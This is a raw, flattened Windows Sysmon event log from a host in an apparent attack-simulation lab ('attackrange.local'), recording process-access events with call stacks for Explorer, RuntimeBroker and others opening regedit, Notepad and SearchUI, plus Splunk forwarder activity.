12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 354300x800000000000000011106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.475{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53717-false10.0.1.12-8000- 23542300x800000000000000011105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.313{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B238AA1BB222869C7B1FC8163B4F7EDB,SHA256=F9A5201F9ADD06C13801861EA734CA577B364A04005D529FF4BE0E4607FB1C2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43561212C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:54.298{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.235{266CAFBE-646C-6064-1000-00000000AE01}11242204C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:54.235{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.735{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:55.391{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23117188151B8997D54DE4F0655252F0,SHA256=4488F038AD28D5B64DEEEAC8DA83038C2FAA5F3EDE9A2D1365D07F5EE90679B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:56.829{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:56.829{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
